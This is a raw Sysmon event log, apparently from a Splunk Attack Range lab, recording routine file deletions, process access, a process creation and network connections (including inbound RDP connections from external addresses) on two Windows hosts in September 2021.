23542300x80000000000000001049090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:32.492{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22708D8BDEB7029BE2F861403D112F60,SHA256=CAB3211A15A640A82CE54581C4E66A16622E9714A1FDECEBB9A54A24A1FD1D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:32.502{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=955D06F2B5D4A12401C4847CE510E392,SHA256=CB4E4C1F6405555492BE969345C4A89241FD460B7E2CD873CD46D2E13E48917A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:32.191{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:33.971{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB1F25F3ADBACF937FCB431353440509,SHA256=103DBEE63C3F86E1572EAFF2432DC913384969346E76F81F21128D670F8321B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:33.506{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0236D501CEAB14921969B4746F9DC21,SHA256=3F755FC367CC76D77882778B24CF6588F4CCCC08C70683E515718D54068AD9A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:30.914{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-7337-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:34.986{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE5A2060B36EDACFCB6B6AFA7CCDD14,SHA256=191C748B6C6753B124337FCE5C8129858E37BD688FDA13B7A5B4B6C26EF436A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:34.540{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727CE1E2C015350F24FAFEB9BD04AB09,SHA256=C44101B1BF8F8D15768B04CE2B32EEFBA9716A80CE5C9B1271E1B0C9A5534595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:34.002{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B08A07B33DB14BE5E1C2EB80011B5250,SHA256=7ACC03EDB6E10662F5569B8B397DA83F4E55CF57AE43DF917DEE1038B3819E04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:35.558{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E00B6232585007D224FBAE219FB8753,SHA256=C6925905D371A59DDA140DACA601B62FB3B70AA74B70F2AE74ED691DAC148AB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:35.558{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:33.016{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-19490-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:32.725{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59319-false10.0.1.12-8000- 23542300x80000000000000001049099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:36.561{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=794133974207DA2CCC62E435DF619101,SHA256=CD0B37C00DE9D3A2A56E1B365F247065CB80CF8B6339848EF3794FD3721F7244,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:33.934{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de61413-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:36.127{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3397E2C60F2CF211A05E15BB57B1F38B,SHA256=2A78B63E5746AAE4E568E30D415415577E9C1FA848430D8C0D67FD318DBA8FA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:36.033{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B31D1CF3ABFC4863E06AB11CB8AAFDD7,SHA256=E97D9B48318D33B382CE8867545B76866A3587A2948F3846BEBFC544ABCA989F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:36.508{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:36.184{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53286-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001049101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:35.929{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53285-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:37.591{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F16798D3EEC180E0F775DDA5EA74E47C,SHA256=90780CD5CAC33CF175D9561EC79DB222FE37C4308B7985A0B82C9FEB621C9D57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-899D-6151-A379-00000000FD01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-899D-6151-A379-00000000FD01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.642{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-899D-6151-A379-00000000FD01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.628{69CF5F33-899D-6151-A379-00000000FD01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.174{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656FAF2C2A9E432A2E4AC21C1B162338,SHA256=BC9FDAE6CB43197CD58840866267000E50E79B9C34A2738D800F31B57CB99D97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:36.742{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51883-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:38.642{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21AAC38B21BDB0573EEA5373091C1A1B,SHA256=395C24EB0F2FB5A9B7330AFDCC854825D18AB604A4B512B019EA330590868A57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:36.211{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52245-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:35.870{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-64407-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:38.736{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1644C75D546E2C711996A17543F4C7FC,SHA256=FEA65477B4C9B50890B6B3A61CFCEF12D5DBD53A822FB1E0DDDED23951EF4501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:38.267{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 